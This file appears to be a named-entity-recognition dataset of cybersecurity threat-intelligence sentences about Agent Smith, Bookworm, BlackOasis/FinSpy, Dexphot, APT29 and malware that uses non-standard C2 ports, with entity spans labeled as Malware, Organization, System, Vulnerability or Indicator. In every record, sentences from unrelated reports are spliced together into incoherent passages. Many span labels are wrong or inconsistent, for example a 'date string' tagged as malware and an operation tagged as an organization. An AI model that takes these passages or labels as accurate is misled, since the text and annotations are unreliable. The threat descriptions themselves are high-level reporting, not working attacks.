{"text": "( read SMS messages ) Obviously a fairly significant list of permissions of which many are suspicious , especially when combined . Originally , the main infection vector of Blue Termite was spear-phishing emails . Threat Spotlight : Group 72 , Opening the ZxShell . Adversaries may communicate using a protocol and port pairing that are typically not associated .", "spans": [{"start": 173, "end": 185, "label": "System"}, {"start": 233, "end": 241, "label": "Organization"}, {"start": 256, "end": 263, "label": "Malware"}, {"start": 266, "end": 277, "label": "Organization"}]}
{"text": "Runtastic sample permission prompt Runtastic sample permission prompt Checking foreground app Marcher is one of the few Android banking Trojans to use the AndroidProcesses library , which enables the application to obtain the name of the Android package that is currently running in the foreground . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . For example , HTTPS over port 8088[1 ] or port 587[2 ] as opposed to the traditional port 443 .", "spans": [{"start": 0, "end": 9, "label": "System"}, {"start": 35, "end": 44, "label": "System"}, {"start": 94, "end": 101, "label": "Malware"}, {"start": 238, "end": 245, "label": "System"}, {"start": 300, "end": 313, "label": "Organization"}, {"start": 396, "end": 409, "label": "Vulnerability"}, {"start": 412, "end": 425, "label": "Vulnerability"}, {"start": 583, "end": 591, "label": "Vulnerability"}, {"start": 666, "end": 673, "label": "Malware"}, {"start": 725, "end": 736, "label": "Organization"}, {"start": 753, "end": 832, "label": "Indicator"}]}
{"text": "This library is used because it uses the only ( publicly known ) way to retrieve this information on Android 6 ( using the process OOM score read from the /proc directory ) . Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government . The incident , as described by security researchers with Moscow-based cybersecurity firm Kaspersky Lab , shines a rare light on the opaque although apparently vibrant market for software exploits and spyware , which in this case appears to have been purchased by a nation-state . Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis / parsing of network data .", "spans": [{"start": 101, "end": 110, "label": "System"}, {"start": 175, "end": 188, "label": "Organization"}, {"start": 406, "end": 419, "label": "Organization"}, {"start": 517, "end": 524, "label": "Malware"}, {"start": 597, "end": 608, "label": "Organization"}]}
{"text": "When the current app on the foreground matches with an app targeted by the malware , the Trojan will show the corresponding phishing overlay , making the user think it is the app that was just started . In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 . The Middle Eastern hacker group in this case is codenamed \u201c BlackOasis . \u201d Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \u201c FinSpy \u201d malware , according to a new blog post published Monday . Adversaries may also make changes to victim systems to abuse non - standard ports .", "spans": [{"start": 234, "end": 247, "label": "Organization"}, {"start": 386, "end": 396, "label": "Organization"}, {"start": 401, "end": 410, "label": "Organization"}, {"start": 444, "end": 462, "label": "System"}, {"start": 463, "end": 471, "label": "Vulnerability"}, {"start": 488, "end": 501, "label": "Vulnerability"}, {"start": 548, "end": 554, "label": "Malware"}, {"start": 615, "end": 626, "label": "Organization"}]}
{"text": "Dynamic overlays When victims open up a targeted app , Marcher smoothly displays an overlay , a customized WebView , looks in its application preferences ( main_prefs.xml ) and decides which specified URL is needed for the targeted app . From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures . Adobe issued a fix Monday to its users in the form of a software update . For example , Registry keys and other configuration settings can be used to modify protocol and port pairings.[3 ] APT - C-36 has used port 4050 for C2 communications.[4 ]", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 291, "end": 306, "label": "Organization"}, {"start": 421, "end": 426, "label": "Organization"}, {"start": 610, "end": 620, "label": "Organization"}, {"start": 625, "end": 664, "label": "Indicator"}]}
{"text": "The complete list of apps can be seen below . It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group \u2014 which goes by other names , including FinFisher and Lench IT Solutions . An APT32 backdoor can use HTTP over a non - standard TCP port ( e.g 14146 ) which is specified in the backdoor configuration.[5 ]", "spans": [{"start": 57, "end": 60, "label": "System"}, {"start": 76, "end": 79, "label": "System"}, {"start": 137, "end": 143, "label": "Malware"}, {"start": 302, "end": 313, "label": "Organization"}, {"start": 354, "end": 363, "label": "Organization"}, {"start": 368, "end": 386, "label": "Organization"}, {"start": 392, "end": 406, "label": "Malware"}, {"start": 411, "end": 516, "label": "Indicator"}]}
{"text": "The phishing pages shown in the overlay use Ajax calls to communicate with a PHP back-end which stores all user input . In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research . BlackOasis in recent months sent a wave of phishing emails . APT33 has used HTTP over TCP ports 808 and 880 for command and control.[1 ]", "spans": [{"start": 174, "end": 187, "label": "Organization"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 269, "end": 275, "label": "System"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 288, "end": 351, "label": "Indicator"}]}
{"text": "The C2 backend url looks like this : https : //evilhost/c2folder/njs2/ ? Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 . These emails contained malicious Microsoft Word documents with the aforementioned Flash Player zero-day hidden inside an embedded ActiveX object . BADCALL communicates on ports 443 and 8000 with a FakeTLS method.[6 ] Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.[7 ] BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.[8 ]", "spans": [{"start": 37, "end": 72, "label": "Indicator"}, {"start": 73, "end": 81, "label": "System"}, {"start": 129, "end": 134, "label": "System"}, {"start": 218, "end": 225, "label": "Organization"}, {"start": 234, "end": 240, "label": "System"}, {"start": 261, "end": 285, "label": "System"}, {"start": 310, "end": 331, "label": "Vulnerability"}, {"start": 358, "end": 372, "label": "System"}, {"start": 375, "end": 382, "label": "Malware"}, {"start": 383, "end": 417, "label": "Indicator"}, {"start": 445, "end": 453, "label": "Malware"}, {"start": 454, "end": 501, "label": "Indicator"}, {"start": 545, "end": 554, "label": "Malware"}, {"start": 559, "end": 627, "label": "Indicator"}]}
{"text": "fields [ ] . Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China . During C0018 , the threat actors opened a variety of ports , including ports 28035 , 32467 , 41578 , and 46892 , to establish RDP connections.[9 ]", "spans": [{"start": 13, "end": 21, "label": "System"}, {"start": 164, "end": 174, "label": "Organization"}, {"start": 309, "end": 322, "label": "Organization"}, {"start": 351, "end": 434, "label": "Indicator"}]}
{"text": "There is no way to access the original app again even if victims terminate the overlay process and reopen app , until credit card ( name , number , expiry date , security code ) and/or bank information ( PIN , VBV passcode , date of birth , etc . The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks . The term zero-day is indicative of a software flaw that remains unknown to the software \u2019s creator . Cyclops Blink can use non - standard ports for C2 not typically associated with HTTP or HTTPS traffic.[10 ] DarkVishnya used ports 5190 and 7900 for shellcode listeners , and 4444 , 4445 , 31337 for shellcode C2.[11 ]", "spans": [{"start": 251, "end": 264, "label": "System"}, {"start": 270, "end": 278, "label": "System"}, {"start": 300, "end": 311, "label": "Organization"}, {"start": 376, "end": 384, "label": "Vulnerability"}, {"start": 468, "end": 481, "label": "Malware"}, {"start": 518, "end": 573, "label": "Indicator"}, {"start": 576, "end": 587, "label": "Malware"}, {"start": 588, "end": 683, "label": "Indicator"}]}
{"text": ") are filled in and verified . So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand . Zero-days can be highly disruptive because they provide a window of time for an attacker to breach victims before the vendor is able to apply a software update to address the specific security hole . Derusbi has used unencrypted HTTP on port 443 for C2.[12 ]", "spans": [{"start": 83, "end": 98, "label": "System"}, {"start": 145, "end": 154, "label": "Vulnerability"}, {"start": 345, "end": 352, "label": "Malware"}]}
{"text": "The information is then stored in local app database as well as sent to the backend . The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application . U.S . cybersecurity firm FireEye also recently captured BlackOasis activity as part of a similar incident where the group relied on a different zero-day exploit \u2014 more specifically , a SOAP WSDL I-TOOL parser I-VULNAME E-TOOL code injection vulnerability \u2014 to install FinSpy onto a small number of devices . Emotet has used HTTP over ports such as 20 , 22 , 7080 , and 50000 , in addition to using ports commonly associated with HTTP / S.[13 ] FIN7 has used port - protocol mismatches on ports such as 53 , 80 , 443 , and 8080 during C2.[14 ]", "spans": [{"start": 146, "end": 167, "label": "System"}, {"start": 197, "end": 216, "label": "System"}, {"start": 245, "end": 260, "label": "System"}, {"start": 264, "end": 294, "label": "System"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 353, "end": 363, "label": "Organization"}, {"start": 441, "end": 449, "label": "Vulnerability"}, {"start": 482, "end": 486, "label": "System"}, {"start": 487, "end": 537, "label": "Vulnerability"}, {"start": 565, "end": 571, "label": "Malware"}, {"start": 741, "end": 745, "label": "Organization"}, {"start": 796, "end": 837, "label": "Indicator"}]}
{"text": "Agent Smith : A New Species of Mobile Malware July 10 , 2019 Check Point Researchers recently discovered a new variant of mobile malware that quietly infected around 25 million devices , while the user remains completely unaware . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable . Again , the attacker \u2019s intention appeared to be espionage . \u201c Unlike other FinFisher customers or users who focus mostly on domestic operations , BlackOasis focuses on external operations and go after a wide range of targets around the world , \u201d explained Costin Raiu , director of the global research and analysis team at Kaspersky Lab . GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic , 9002 for C2 requests , 33666 as a WebSocket , and 8090 to download files.[15 ] GravityRAT has used HTTP over a non - standard port , such as TCP port 46769.[16 ] HARDRAIN binds and listens on port 443 with a FakeTLS method.[17 ] HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.[18 ] Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic , creating port - protocol mismatches.[19][20 ] MacMa has used TCP port 5633 for C2 Communication.[21 ]", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 61, "end": 72, "label": "Organization"}, {"start": 235, "end": 254, "label": "System"}, {"start": 316, "end": 326, "label": "Malware"}, {"start": 344, "end": 354, "label": "Malware"}, {"start": 495, "end": 504, "label": "Organization"}, {"start": 566, "end": 576, "label": "Organization"}, {"start": 743, "end": 756, "label": "Organization"}, {"start": 759, "end": 768, "label": "Malware"}, {"start": 773, "end": 906, "label": "Indicator"}, {"start": 909, "end": 919, "label": "Malware"}, {"start": 924, "end": 989, "label": "Indicator"}, {"start": 992, "end": 1000, "label": "Malware"}, {"start": 1001, "end": 1056, "label": "Indicator"}, {"start": 1059, "end": 1067, "label": "Malware"}, {"start": 1072, "end": 1108, "label": "Indicator"}, {"start": 1142, "end": 1163, "label": "Malware"}, {"start": 1164, "end": 1277, "label": "Indicator"}, {"start": 1280, "end": 1285, "label": "Malware"}, {"start": 1295, "end": 1308, "label": "Indicator"}, {"start": 1313, "end": 1333, "label": "System"}]}
{"text": "Disguised as Google related app , the core part of malware exploits various known Android vulnerabilities and automatically replaces installed apps on the device with malicious versions without the user \u2019 s interaction . targeted attacks . Gamma Group has been accused of selling its products to authoritarian regimes that can use the technology to both track dissidents and conduct foreign espionage over the internet . Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.[22][23 ]", "spans": [{"start": 13, "end": 19, "label": "Organization"}, {"start": 82, "end": 105, "label": "Vulnerability"}, {"start": 240, "end": 251, "label": "Organization"}, {"start": 421, "end": 440, "label": "Malware"}, {"start": 445, "end": 525, "label": "Indicator"}]}
{"text": "This unique on-device , just-in-time ( JIT ) approach inspired researchers to dub this malware as \u201c Agent Smith \u201d . Using XREFs during static analysis is a common technique to quickly find where functions of interest are called . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . Metamorfo has communicated with hosts over raw TCP on port 9999.[24 ]", "spans": [{"start": 100, "end": 111, "label": "Malware"}, {"start": 122, "end": 127, "label": "System"}, {"start": 184, "end": 216, "label": "Malware"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 282, "end": 290, "label": "Vulnerability"}, {"start": 307, "end": 317, "label": "Organization"}, {"start": 372, "end": 381, "label": "Malware"}, {"start": 386, "end": 439, "label": "Indicator"}]}
{"text": "\u201c Agent Smith \u201d currently uses its broad access to the device \u2019 s resources to show fraudulent ads for financial gain . The developers designed Bookworm to be a modular Trojan not limited to just the initial architecture of the Trojan , as Bookworm can also load additional modules provided by the C2 server . It \u2019s unclear whether the hackers are purchasing the exploits and spyware together , directly from Gamma Group , or if they were able to acquire some of the tools through other avenues . \u201c BlackOasis \u2019 interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region . MoonWind communicates over ports 80 , 443 , 53 , and 8080 via raw sockets instead of the protocols usually associated with the ports.[25 ] njRAT has used port 1177 for HTTP C2 communications.[26 ] During Operation Wocao , the threat actors used uncommon high ports for its backdoor C2 , including ports 25667 and 47000.[27 ]", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 144, "end": 152, "label": "System"}, {"start": 161, "end": 175, "label": "System"}, {"start": 240, "end": 248, "label": "System"}, {"start": 376, "end": 383, "label": "Malware"}, {"start": 409, "end": 420, "label": "Organization"}, {"start": 499, "end": 509, "label": "Organization"}, {"start": 645, "end": 653, "label": "Malware"}, {"start": 654, "end": 781, "label": "Indicator"}, {"start": 784, "end": 789, "label": "Malware"}, {"start": 799, "end": 808, "label": "Indicator"}, {"start": 813, "end": 839, "label": "System"}, {"start": 849, "end": 864, "label": "Organization"}, {"start": 871, "end": 884, "label": "Organization"}, {"start": 890, "end": 909, "label": "Indicator"}, {"start": 918, "end": 929, "label": "System"}, {"start": 942, "end": 953, "label": "Indicator"}, {"start": 958, "end": 967, "label": "Indicator"}]}
{"text": "This activity resembles previous campaigns such as Gooligan , HummingBad and CopyCat . Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server . This includes prominent figures in the United Nations , opposition bloggers and activists , and regional news correspondents , \u201d a blogpost about Kaspersky \u2019s findings reads . PingPull can use HTTPS over port 8080 for C2.[28 ]", "spans": [{"start": 51, "end": 59, "label": "Malware"}, {"start": 62, "end": 72, "label": "Malware"}, {"start": 77, "end": 84, "label": "Malware"}, {"start": 114, "end": 122, "label": "System"}, {"start": 170, "end": 178, "label": "System"}, {"start": 254, "end": 268, "label": "Malware"}, {"start": 333, "end": 339, "label": "System"}, {"start": 354, "end": 384, "label": "Malware"}, {"start": 533, "end": 542, "label": "Organization"}, {"start": 563, "end": 571, "label": "Malware"}, {"start": 580, "end": 585, "label": "System"}, {"start": 586, "end": 600, "label": "Indicator"}, {"start": 605, "end": 611, "label": "System"}]}
{"text": "The primary targets , so far , are based in India though other Asian countries such as Pakistan and Bangladesh are also affected . While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand . The post continues , \u201c during 2016 , we observed a heavy interest in Angola , exemplified by lure documents indicating targets with suspected ties to oil , money laundering , and other illicit activities . PoetRAT used TLS to encrypt communications over port 143 QuasarRAT can use port 4782 on the compromised host for TCP callbacks .", "spans": [{"start": 186, "end": 194, "label": "System"}, {"start": 248, "end": 256, "label": "System"}, {"start": 509, "end": 516, "label": "Malware"}, {"start": 522, "end": 525, "label": "System"}, {"start": 552, "end": 565, "label": "Indicator"}, {"start": 566, "end": 575, "label": "Malware"}, {"start": 584, "end": 593, "label": "Indicator"}]}
{"text": "In a much-improved Android security environment , the actors behind Agent Smith seem to have moved into the more complex world of constantly searching for new loopholes , such as Janus , Bundle and Man-in-the-Disk , to achieve a 3-stage infection chain , in order to build a botnet of controlled devices to earn profit for the perpetrator . Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server . There is also an interest in international activists and think tanks \u2026 Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola . \u201d RedLeaves can use HTTP over non - standard ports , such as 995 , for C2.Rocke 's miner connects to a C2 server using port 51640.[32 ]", "spans": [{"start": 19, "end": 26, "label": "System"}, {"start": 68, "end": 79, "label": "Malware"}, {"start": 179, "end": 184, "label": "Vulnerability"}, {"start": 187, "end": 193, "label": "Vulnerability"}, {"start": 198, "end": 213, "label": "Vulnerability"}, {"start": 348, "end": 356, "label": "System"}, {"start": 559, "end": 569, "label": "Organization"}, {"start": 761, "end": 770, "label": "Malware"}, {"start": 775, "end": 823, "label": "Indicator"}, {"start": 862, "end": 871, "label": "System"}, {"start": 878, "end": 892, "label": "Indicator"}]}
{"text": "\u201c Agent Smith \u201d is possibly the first campaign seen that ingrates and weaponized all these loopholes and are described in detail below . The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server . Intent was clearly espionage in many cases , going outside of that \"lawful surveillance\" boundary.\u2014 Brian Bartholomew ( @Mao_Ware ) October 16, 2017 Brian Bartholomew , a senior security researcher with Kaspersky , said on Twitter that BlackOasis \u2019 espionage included non-traditional targets \u2014 \u201c going outside of that lawful surveillance boundary. \u201d RTM used Port 44443 for its VNC module .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 155, "end": 163, "label": "System"}, {"start": 522, "end": 531, "label": "Organization"}, {"start": 542, "end": 549, "label": "System"}, {"start": 555, "end": 565, "label": "Organization"}, {"start": 669, "end": 672, "label": "Organization"}, {"start": 678, "end": 688, "label": "Indicator"}, {"start": 697, "end": 707, "label": "System"}]}
{"text": "In this case , \u201c Agent Smith \u201d is being used to for financial gain through the use of malicious advertisements . Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns . An advanced persistent threat group , previously identified by Microsoft and codenamed Neodymium , is closely associated with BlackOasis \u2019 operations . Sandworm Team has used port 6789 to accept connections on the group 's SSH server.[34 ] Silence has used port 444 when sending data about the system from the client to the server.[35 ] StrongPity has used HTTPS over port 1402 in C2 communication.[36 ] SUGARUSH has used port 4585 for a TCP connection to its C2 .", "spans": [{"start": 17, "end": 28, "label": "Malware"}, {"start": 113, "end": 120, "label": "Organization"}, {"start": 183, "end": 191, "label": "System"}, {"start": 396, "end": 405, "label": "Organization"}, {"start": 420, "end": 429, "label": "Organization"}, {"start": 459, "end": 469, "label": "Organization"}, {"start": 485, "end": 498, "label": "Organization"}, {"start": 508, "end": 517, "label": "Indicator"}, {"start": 556, "end": 570, "label": "System"}, {"start": 573, "end": 580, "label": "Organization"}, {"start": 590, "end": 598, "label": "Indicator"}, {"start": 670, "end": 680, "label": "Organization"}, {"start": 690, "end": 695, "label": "System"}, {"start": 696, "end": 710, "label": "Indicator"}, {"start": 714, "end": 734, "label": "System"}, {"start": 737, "end": 745, "label": "Malware"}, {"start": 755, "end": 764, "label": "Indicator"}, {"start": 769, "end": 795, "label": "System"}]}
{"text": "However , it could easily be used for far more intrusive and harmful purposes such as banking credential theft . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality . Last year , Microsoft researchers described Neodymium \u2019s behavior as unusual : \u201c unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . TEMP.Veles has used port - protocol mismatches on ports such as 443 , 4444 , 8531 , and 50501 during C2 .", "spans": [{"start": 113, "end": 119, "label": "System"}, {"start": 123, "end": 131, "label": "System"}, {"start": 227, "end": 231, "label": "Malware"}, {"start": 280, "end": 289, "label": "Organization"}, {"start": 312, "end": 321, "label": "Organization"}, {"start": 456, "end": 466, "label": "Organization"}, {"start": 471, "end": 480, "label": "Organization"}, {"start": 565, "end": 575, "label": "Malware"}, {"start": 580, "end": 658, "label": "Indicator"}, {"start": 666, "end": 668, "label": "System"}]}
{"text": "Indeed , due to its ability to hide it \u2019 s icon from the launcher and impersonates any popular existing apps on a device , there are endless possibilities for this sort of malware to harm a user \u2019 s device . The developers of Bookworm use these modules in a rather unique way , as the other embedded DLLs provide API functions for Leader to carry out its tasks . These activity groups are also unusual in that they use the same zero-day exploit to launch attacks at around the same time in the same region . Some TrickBot samples have used HTTP over ports 447 and 8082 for C2 .", "spans": [{"start": 226, "end": 234, "label": "System"}, {"start": 331, "end": 337, "label": "System"}, {"start": 428, "end": 436, "label": "Vulnerability"}, {"start": 513, "end": 521, "label": "Malware"}, {"start": 540, "end": 559, "label": "Indicator"}, {"start": 564, "end": 568, "label": "Indicator"}, {"start": 573, "end": 575, "label": "System"}]}
{"text": "Check Point Research has submitted data to Google and law enforcement units to facilitate further investigation . Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand . Their targets , however , appear to be individuals that do not share common affiliations. \u201d Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443 .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 43, "end": 49, "label": "Organization"}, {"start": 114, "end": 121, "label": "Organization"}, {"start": 181, "end": 197, "label": "System"}, {"start": 266, "end": 276, "label": "Organization"}, {"start": 401, "end": 409, "label": "Malware"}, {"start": 503, "end": 511, "label": "Indicator"}]}
{"text": "As a result , information related to the malicious actor is tentatively redacted in this publication . We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" . A cursory review of BlackOasis \u2019 espionage campaign suggests there is some overlap between the group \u2019s actions and Saudi Arabia \u2019s geopolitical interests . [ 42 ] TYPEFRAME has used ports 443 , 8080 , and 8443 with a FakeTLS method .", "spans": [{"start": 146, "end": 154, "label": "System"}, {"start": 241, "end": 257, "label": "Malware"}, {"start": 286, "end": 304, "label": "System"}, {"start": 405, "end": 415, "label": "Organization"}, {"start": 549, "end": 558, "label": "Malware"}, {"start": 568, "end": 577, "label": "Indicator"}, {"start": 580, "end": 584, "label": "Indicator"}, {"start": 591, "end": 595, "label": "Indicator"}]}
{"text": "Check Point has worked closely with Google and at the time of publishing , no malicious apps remain on the Play Store . We believe that it is likely threat actors will continue development Bookworm , and will continue to use it for the foreseeable future . For example , the targeting of Angolan organizations in mid-2016 coincidences directly with the rise of Angola \u2019s oil business with China , which displaced Saudi Arabia as the number one exporter of crude oil to China at the time . WellMail has been observed using TCP port 25 , without using SMTP , to leverage an open port for secure command and control communications .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 36, "end": 42, "label": "Organization"}, {"start": 107, "end": 117, "label": "System"}, {"start": 189, "end": 197, "label": "System"}, {"start": 288, "end": 309, "label": "Organization"}, {"start": 489, "end": 497, "label": "Malware"}, {"start": 522, "end": 533, "label": "Indicator"}]}
{"text": "Encounter In early 2019 , the Check Point Research team observed a surge of Android malware attack attempts against users in India which had strong characteristics of Janus vulnerability abuse ; All samples our team collected during preliminary investigation had the ability to hide their app icons and claim to be Google related updaters or vending modules ( a key component of Google Play framework ) . Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established policy agreements . WIRTE has used HTTPS over ports 2083 and 2087 for C2.ZxShell can use ports 1985 and 1986 in HTTP / S communication.[47 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": [{"start": 30, "end": 41, "label": "Organization"}, {"start": 76, "end": 83, "label": "System"}, {"start": 167, "end": 172, "label": "Vulnerability"}, {"start": 315, "end": 321, "label": "Organization"}, {"start": 379, "end": 390, "label": "System"}, {"start": 434, "end": 442, "label": "System"}, {"start": 515, "end": 524, "label": "Organization"}, {"start": 545, "end": 555, "label": "Organization"}, {"start": 714, "end": 719, "label": "Malware"}, {"start": 729, "end": 734, "label": "System"}, {"start": 740, "end": 759, "label": "Indicator"}, {"start": 764, "end": 774, "label": "Malware"}, {"start": 783, "end": 832, "label": "Indicator"}]}
{"text": "Upon further analysis it became clear this application was as malicious as they come and initially resembled the CopyCat malware , discovered by Check Point Research back in April 2016 . Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand . In addition , Saudi Arabia is a known customer of spyware and has used the technology domestically , according to Citizen Lab , a cybersecurity and human-rights focused research laboratory . Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment .", "spans": [{"start": 113, "end": 120, "label": "Malware"}, {"start": 145, "end": 156, "label": "Organization"}, {"start": 243, "end": 262, "label": "System"}, {"start": 410, "end": 417, "label": "Malware"}, {"start": 474, "end": 485, "label": "Organization"}]}
{"text": "As the research progressed , it started to reveal unique characteristics which made us believe we were looking at an all-new malware campaign found in the wild . As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code . Kaspersky \u2019s research notes that BlackOasis hacked into computers based in Saudi Arabia . Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used .", "spans": [{"start": 199, "end": 207, "label": "System"}, {"start": 214, "end": 220, "label": "System"}, {"start": 221, "end": 247, "label": "Malware"}, {"start": 306, "end": 315, "label": "Organization"}, {"start": 339, "end": 349, "label": "Organization"}]}
{"text": "After a series of technical analysis ( which is covered in detail below ) and heuristic threat hunting , we discovered that a complete \u201c Agent Smith \u201d infection has three main phases : A dropper app lures victim to install itself voluntarily . We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan . Insights from one year of tracking a polymorphic threat . Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port .", "spans": [{"start": 137, "end": 148, "label": "Malware"}, {"start": 287, "end": 296, "label": "System"}, {"start": 427, "end": 443, "label": "Malware"}]}
{"text": "The initial dropper has a weaponized Feng Shui Bundle as encrypted asset files . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . A little over a year ago , in October 2018 , our polymorphic outbreak monitoring system detected a large surge in reports , indicating that a large-scale campaign was unfolding . Additional Email Delegate Permissions APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with ApplicationImpersonation rights to start collecting emails from targeted mailboxe .", "spans": [{"start": 107, "end": 128, "label": "Malware"}, {"start": 139, "end": 154, "label": "System"}, {"start": 160, "end": 176, "label": "Malware"}, {"start": 396, "end": 401, "label": "Organization"}]}
{"text": "Dropper variants are usually barely functioning photo utility , games , or sex related apps . A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting . We observed as the new threat attempted to deploy files that changed every 20-30 minutes on thousands of devices . During the SolarWinds Compromise , APT29 added their own devices as allowed IDs for active sync using Set - CASMailbox , allowing it to obtain copies of victim mailboxes .", "spans": [{"start": 113, "end": 129, "label": "Malware"}, {"start": 171, "end": 179, "label": "Malware"}, {"start": 394, "end": 415, "label": "Organization"}, {"start": 418, "end": 423, "label": "Organization"}]}
{"text": "The dropper automatically decrypts and installs its core malware APK which later conducts malicious patching and app updates . Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . We gave the threat the name \u201c Dexphot , \u201d based on certain characteristics of the malware code . Device Registration APT29 has enrolled a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account .", "spans": [{"start": 162, "end": 173, "label": "Malware"}, {"start": 191, "end": 201, "label": "Malware"}, {"start": 215, "end": 232, "label": "Malware"}, {"start": 247, "end": 255, "label": "System"}, {"start": 305, "end": 312, "label": "Malware"}, {"start": 372, "end": 397, "label": "Organization"}]}
{"text": "The core malware is usually disguised as Google Updater , Google Update for U or \u201c com.google.vending \u201d . We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information . The Dexphot attack used a variety of sophisticated methods to evade security solutions . During the SolarWinds Compromise , APT29 registered devices in order to enable mailbox syncing via the Set - CASMailbox command . .006", "spans": [{"start": 41, "end": 47, "label": "Organization"}, {"start": 58, "end": 64, "label": "Organization"}, {"start": 83, "end": 101, "label": "Indicator"}, {"start": 122, "end": 138, "label": "System"}, {"start": 139, "end": 165, "label": "Malware"}, {"start": 307, "end": 314, "label": "Malware"}, {"start": 403, "end": 424, "label": "Organization"}, {"start": 427, "end": 432, "label": "Organization"}]}
{"text": "The core malware \u2019 s icon is hidden . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 . Layers of obfuscation , encryption , and the use of randomized file names hid the installation process . Acquire Infrastructure : Web Services APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware , such as HAMMERTOSS .", "spans": [{"start": 46, "end": 61, "label": "Malware"}, {"start": 292, "end": 310, "label": "Organization"}, {"start": 386, "end": 388, "label": "System"}, {"start": 392, "end": 399, "label": "Malware"}, {"start": 410, "end": 420, "label": "Malware"}]}
{"text": "The core malware extracts the device \u2019 s installed app list . The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Price of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event . Dexphot then used fileless techniques to run malicious code directly in memory , leaving only a few traces that can be used for forensics . APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations .", "spans": [{"start": 150, "end": 155, "label": "Organization"}, {"start": 269, "end": 276, "label": "Malware"}, {"start": 409, "end": 414, "label": "Organization"}]}
